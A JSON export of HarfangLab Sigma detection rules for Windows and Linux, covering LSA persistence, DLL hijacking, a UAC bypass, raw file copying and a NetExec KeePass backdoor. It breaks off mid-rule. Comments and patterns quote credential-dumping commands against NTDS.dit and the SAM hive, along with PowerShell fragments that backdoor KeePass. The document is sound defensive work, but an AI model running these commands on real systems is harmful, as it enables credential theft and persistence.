{
"id": "003481a2-e45e-44fd-9433-b13492669c31",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.076504Z",
"creation_date": "2026-03-23T11:45:34.076506Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076511Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.ired.team/offensive-security/credential-access-and-credential-dumping/t1174-password-filter-dll",
"https://attack.mitre.org/techniques/T1547/002/"
],
"name": "t1547_002_persistence_lsa_authentication_package.yml",
"content": "title: LSA Authentication Package Installed\nid: 003481a2-e45e-44fd-9433-b13492669c31\ndescription: |\n Detects the installation of a new authentication package via a registry modification.\n The LSA (Local Security Authority) is a critical Windows component responsible for managing security policies and authentication.\n Attackers may install these packages to gain elevated privileges or establish persistence.\n It is recommended to investigate the source of the configuration change, review the permissions and ownership of the affected LSA settings, and verify the legitimacy of the modification.\n If the change cannot be attributed to a legitimate process, consider rolling back the configuration.\nreferences:\n - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/t1174-password-filter-dll\n - https://attack.mitre.org/techniques/T1547/002/\ndate: 2020/09/22\nmodified: 2025/05/05\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1547.002\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.LSASSAccess\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n TargetObject:\n - 'HKLM\\System\\CurrentControlSet\\Control\\Lsa\\Authentication Packages'\n - 'HKLM\\System\\CurrentControlSet\\Control\\Lsa\\OSConfig\\Authentication Packages'\n\n filter_empty:\n Details: '(Empty)'\n\n exclusion_malwarebytes:\n Image: '?:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe'\n\n exclusion_scecli:\n EventType: SetValue\n TargetObject: 'HKLM\\System\\CurrentControlSet\\Control\\Lsa\\Authentication Packages'\n Details: 'scecli'\n\n exclusion_msv10:\n EventType: SetValue\n TargetObject: 'HKLM\\System\\CurrentControlSet\\Control\\Lsa\\Authentication Packages'\n Details: 'msv1_0' # default value\n\n exclusion_known_fp:\n Details:\n - 'msv1_0'\n - 'msv1_0;sshdpinauthlsa' # C:\\WINDOWS\\system32\\SshdPinAuthLsa.dll, DLL from microsoft\n - 'msv1_0;ZenV1_0' # Novell ZENworks\n - 'msv1_0;nxlsa' # NoMachine S.a.r.l.\n - 'msv1_0;BvLsaEx' # BvSshServer-Inst.exe\n - 'msv1_0;teleport' # teleport-windows-auth-setup - Teleport RMM - https://goteleport.com/download/?product=connect&os=windows\n - 'msv1_0;CSALsubauth' # https://www.authlite.com/\n - 'msv1_0;wvauth' # Wave Systems Corp.\n - 'msv1_0;?:\\Program Files (x86)\\ScreenConnect Client (????????????????)\\ScreenConnect.WindowsAuthenticationPackage.dll'\n - 'msv1_0;?:\\Program Files (x86)\\ScreenConnect Client (????????????????)\\ScreenConnect.WindowsAuthenticationPackage.dll;?:\\Program Files (x86)\\ScreenConnect Client (????????????????)\\ScreenConnect.WindowsAuthenticationPackage.dll'\n - 'msv1_0;SshdPinAuthLsa;?:\\Program Files (x86)\\ScreenConnect Client (????????????????)\\ScreenConnect.WindowsAuthenticationPackage.dll'\n - 'msv1_0;SshdPinAuthLsa;?:\\Program Files (x86)\\ScreenConnect Client (????????????????)\\ScreenConnect.WindowsAuthenticationPackage.dll;?:\\Program Files (x86)\\ScreenConnect Client (????????????????)\\ScreenConnect.WindowsAuthenticationPackage.dll'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "003481a2-e45e-44fd-9433-b13492669c31",
"rule_name": "LSA Authentication Package Installed",
"rule_description": "Detects the installation of a new authentication package via a registry modification.\nThe LSA (Local Security Authority) is a critical Windows component responsible for managing security policies and authentication.\nAttackers may install these packages to gain elevated privileges or establish persistence.\nIt is recommended to investigate the source of the configuration change, review the permissions and ownership of the affected LSA settings, and verify the legitimacy of the modification.\nIf the change cannot be attributed to a legitimate process, consider rolling back the configuration.\n",
"rule_creation_date": "2020-09-22",
"rule_modified_date": "2025-05-05",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1547.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "006ebafe-6e79-4642-a76f-5073a4cc1bc5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.098649Z",
"creation_date": "2026-03-23T11:45:34.098651Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.098656Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dnscacheugc.yml",
"content": "title: DLL Hijacking via dnscacheugc.exe\nid: 006ebafe-6e79-4642-a76f-5073a4cc1bc5\ndescription: |\n Detects potential Windows DLL Hijacking via dnscacheugc.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dnscacheugc.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dbgcore.DLL'\n - '\\dbghelp.dll'\n - '\\IPHLPAPI.DLL'\n - '\\wdscore.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "006ebafe-6e79-4642-a76f-5073a4cc1bc5",
"rule_name": "DLL Hijacking via dnscacheugc.exe",
"rule_description": "Detects potential Windows DLL Hijacking via dnscacheugc.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0070bcf5-0b6e-40f9-9b07-baad4a18cf84",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.627344Z",
"creation_date": "2026-03-23T11:45:34.627346Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.627350Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/jschicht/RawCopy",
"http://blog.opensecurityresearch.com/2011/10/how-to-acquire-locked-files-from.html",
"https://attack.mitre.org/techniques/T1006/"
],
"name": "t1006_raw_access_files.yml",
"content": "title: Files Accessed via Raw Device Access\nid: 0070bcf5-0b6e-40f9-9b07-baad4a18cf84\ndescription: |\n Detects raw access to files through tools like RawCopy or FGET.\n Attackers can raw access files to dump them and evade detection mechanisms, as well as bypass locked files.\n It is recommended to investigate the command-line arguments to check which file was accessed and to analyze the parent process for suspicious activities.\nreferences:\n - https://github.com/jschicht/RawCopy\n - http://blog.opensecurityresearch.com/2011/10/how-to-acquire-locked-files-from.html\n - https://attack.mitre.org/techniques/T1006/\ndate: 2022/10/19\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1006\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.RawCopy\n - classification.Windows.Tool.FGET\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # RawCopy.exe /FileNamePath:C:\\Windows\\NTDS\\ntds.dit /OutputPath:C:\\Windows\\Temp\\ntds.dit\n selection_rawcopy:\n LegalCopyright: 'Joakim Schicht'\n Description: 'Copy files from NTFS volumes by using low level disk access'\n CommandLine|contains: 'FileNamePath'\n\n # FGET.exe -extract C:\\Windows\\System32\\config\\SAM C:\\Windows\\Temp\\out.sam\n selection_fget:\n # Signed by HBGary, Inc\n # The certificate was explicitly revoked by its issuer\n Imphash: '72B17395940FD0266D2CBBF8EB32CF3C'\n CommandLine|contains: 'extract'\n\n # This is handled by the rule aaf113bc-6b63-46d3-919a-9b2a105bcd5f\n filter_sensitive_files:\n CommandLine|contains:\n - '\\Windows\\NTDS\\NTDS.dit'\n - '\\Windows\\System32\\config\\SAM'\n - '\\Windows\\System32\\config\\SECURITY'\n - '\\Windows\\System32\\config\\SYSTEM'\n\n exclusion_bmc:\n Ancestors|endswith: '?:\\Program Files\\BMC Software\\BladeLogic\\RSC\\RSCDsvc.exe|?:\\Windows\\System32\\services.exe|?:\\Windows\\System32\\wininit.exe'\n\n condition: 1 of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0070bcf5-0b6e-40f9-9b07-baad4a18cf84",
"rule_name": "Files Accessed via Raw Device Access",
"rule_description": "Detects raw access to files through tools like RawCopy or FGET.\nAttackers can raw access files to dump them and evade detection mechanisms, as well as bypass locked files.\nIt is recommended to investigate the command-line arguments to check which file was accessed and to analyze the parent process for suspicious activities.\n",
"rule_creation_date": "2022-10-19",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "008189c4-a1fb-4a50-86ed-a178011f9cc2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.077824Z",
"creation_date": "2026-03-23T11:45:34.077826Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.077830Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://pentestlab.blog/2017/06/09/uac-bypass-sdclt/",
"https://attack.mitre.org/techniques/T1548/002/"
],
"name": "t1548_002_post_uac_bypass_sdclt.yml",
"content": "title: UAC Bypass Executed via sdclt\nid: 008189c4-a1fb-4a50-86ed-a178011f9cc2\ndescription: |\n Detects an unusual process being spawned by sdclt.exe.\n This is action is probably the result of a UAC bypass attempt, prepared by setting specific values in thre registry.\n Adversaries may bypass UAC mechanisms to elevate process privileges on a system to perform a task under administrator-level permissions.\n It is recommended to investigate the detected process and its execution context to determine its legitimacy.\nreferences:\n - https://pentestlab.blog/2017/06/09/uac-bypass-sdclt/\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2020/10/12\nmodified: 2025/02/05\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.Hijacking\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage|endswith: '\\sdclt.exe'\n\n filter_common:\n Image:\n - '?:\\Windows\\System32\\sdclt.exe'\n - '?:\\Windows\\System32\\control.exe'\n - '?:\\Windows\\System32\\recdisc.exe'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "008189c4-a1fb-4a50-86ed-a178011f9cc2",
"rule_name": "UAC Bypass Executed via sdclt",
"rule_description": "Detects an unusual process being spawned by sdclt.exe.\nThis is action is probably the result of a UAC bypass attempt, prepared by setting specific values in thre registry.\nAdversaries may bypass UAC mechanisms to elevate process privileges on a system to perform a task under administrator-level permissions.\nIt is recommended to investigate the detected process and its execution context to determine its legitimacy.\n",
"rule_creation_date": "2020-10-12",
"rule_modified_date": "2025-02-05",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "00a9c87a-2497-4d37-878f-7cb8f3560972",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.091095Z",
"creation_date": "2026-03-23T11:45:34.091097Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.091102Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/Pennyw0rth/NetExec/blob/1af282888cd514cf9b4a08ff7caeb26c64625d90/nxc/data/keepass_trigger_module/AddKeePassTrigger.ps1",
"https://attack.mitre.org/techniques/T1555/005/",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1555_005_netexec_keepass.yml",
"content": "title: KeePass Backdoored via NetExec\nid: 00a9c87a-2497-4d37-878f-7cb8f3560972\ndescription: |\n Detects a dump of a KeePass database made using the NetExec tools.\n NetExec is a tool intended to ease lateral movement, internal recon and credential gathering actions.\n It is recommended to investigate actions made by the child process and identify the source of the remote connection using authentication logs.\nreferences:\n - https://github.com/Pennyw0rth/NetExec/blob/1af282888cd514cf9b4a08ff7caeb26c64625d90/nxc/data/keepass_trigger_module/AddKeePassTrigger.ps1\n - https://attack.mitre.org/techniques/T1555/005/\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2024/07/23\nmodified: 2025/01/15\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1555.005\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.HackTool.NetExec\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.Exfiltration\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection_add:\n PowershellCommand|contains|all:\n - '$Null = $KeePassXML.Configuration.Application.TriggerSystem.Triggers.AppendChild($KeePassXML.ImportNode($TriggerXML.Trigger, $True))'\n - \"$Null = $KeePassXML.Configuration.Application.TriggerSystem.ReplaceChild($Triggers, $KeePassXML.Configuration.Application.TriggerSystem.SelectSingleNode('Triggers'))\"\n - 'bES7XfGLTA2IzmXm6a0pig=='\n - 'D5prW87VRr65NO2xP5RIIg=='\n selection_remove:\n PowershellCommand|contains|all:\n - '$KeePassXML.Configuration.Application.TriggerSystem.Triggers.RemoveChild($Child)'\n - '$Children = $KeePassXML.Configuration.Application.TriggerSystem.Triggers | ForEach-Object {$_.Trigger} | Where-Object {$_.Name -like $TriggerName}'\n - \"if($KeePassXMLPath -and ($KeePassXMLPath -match '.\\\\.xml$') -and (Test-Path -Path $KeePassXMLPath) ) {\"\n selection_restart:\n PowershellCommand|contains|all:\n - \"if($KeePassXMLPath -and ($KeePassXMLPath -match '.\\\\.xml$') -and (Test-Path -Path $KeePassXMLPath) ) {\"\n - 'taskkill /F /T /IM keepass.exe /FI \"USERNAME eq $KeePassUser\"'\n condition: 1 of selection_*\nlevel: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "00a9c87a-2497-4d37-878f-7cb8f3560972",
"rule_name": "KeePass Backdoored via NetExec",
"rule_description": "Detects a dump of a KeePass database made using the NetExec tools.\nNetExec is a tool intended to ease lateral movement, internal recon and credential gathering actions.\nIt is recommended to investigate actions made by the child process and identify the source of the remote connection using authentication logs.\n",
"rule_creation_date": "2024-07-23",
"rule_modified_date": "2025-01-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1555.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "00d0b7b5-b0af-4d67-8658-5a08f0acf307",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618852Z",
"creation_date": "2026-03-23T11:45:34.618854Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618858Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_infdefaultinstall.yml",
"content": "title: DLL Hijacking via InfDefaultInstall.exe\nid: 00d0b7b5-b0af-4d67-8658-5a08f0acf307\ndescription: |\n Detects potential Windows DLL Hijacking via InfDefaultInstall.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'InfDefaultInstall.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\drvstore.dll'\n - '\\newdev.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "00d0b7b5-b0af-4d67-8658-5a08f0acf307",
"rule_name": "DLL Hijacking via InfDefaultInstall.exe",
"rule_description": "Detects potential Windows DLL Hijacking via InfDefaultInstall.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "00ecf213-801a-4ee0-b19d-fbe12001d4a3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.719555Z",
"creation_date": "2026-03-23T11:45:34.612526Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.612534Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://research.checkpoint.com/2022/apt35-exploits-log4j-vulnerability-to-distribute-new-modular-powershell-toolkit/",
"https://attack.mitre.org/techniques/T1136/001/"
],
"name": "t1136_001_useradd_linux.yml",
"content": "title: User Created via useradd\nid: 00ecf213-801a-4ee0-b19d-fbe12001d4a3\ndescription: |\n Detects an attempt to create a new user using the useradd utility.\n Adversaries may create new users to hide their activity or achieve persistence.\n It is recommended to investigate whether the process has legitimate reasons to create a user as well as to look for possible suspicious activities on the host.\nreferences:\n - https://research.checkpoint.com/2022/apt35-exploits-log4j-vulnerability-to-distribute-new-modular-powershell-toolkit/\n - https://attack.mitre.org/techniques/T1136/001/\ndate: 2023/01/03\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1136.001\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.AccountManipulation\n - classification.Linux.Behavior.Persistence\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/useradd'\n exclusion_dpkg:\n - ProcessImage: '/usr/bin/dpkg'\n - ProcessParentImage: '/usr/bin/dpkg'\n - ProcessGrandparentImage: '/usr/bin/dpkg'\n exclusion_dpkg_cmds_bin:\n - ProcessCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/dpkg-'\n exclusion_dpkg_cmds_sbin:\n - ProcessCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/sbin/dpkg-'\n exclusion_apt:\n - ProcessImage: '/usr/bin/apt'\n - ProcessParentImage: '/usr/bin/apt'\n - ProcessGrandparentImage: '/usr/bin/apt'\n exclusion_yum:\n - ProcessCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - '/usr/bin/python -Estt /usr/local/psa/bin/yum_install ' # Plesk'\n - ProcessParentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n exclusion_rpm:\n - ProcessParentCommandLine|startswith: '/bin/sh /var/tmp/rpm-tmp.'\n - ProcessGrandparentCommandLine|startswith: '/bin/sh /var/tmp/rpm-tmp.'\n\n exclusion_debconf:\n - ProcessCommandLine|contains: '/usr/bin/debconf'\n - ProcessParentCommandLine|contains: '/usr/bin/debconf'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/debconf'\n exclusion_dpkg_postinstall:\n - ProcessCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessParentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessGrandparentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n\n # This command is different on debian distros\n exclusion_nxlog_redhat:\n ProcessCommandLine: 'useradd -r -g nxlog -d /var/spool/nxlog -s /sbin/nologin -c user for the nxlog log managment tool nxlog'\n\n exclusion_ossec:\n ProcessParentImage: '/var/ossec/bin/wazuh-modulesd'\n\n exclusion_puppet:\n ProcessParentImage: '/opt/puppetlabs/puppet/bin/ruby'\n\n exclusion_aws:\n ProcessCommandLine: '/bin/bash /var/lib/cloud/instance/scripts/part-001'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - 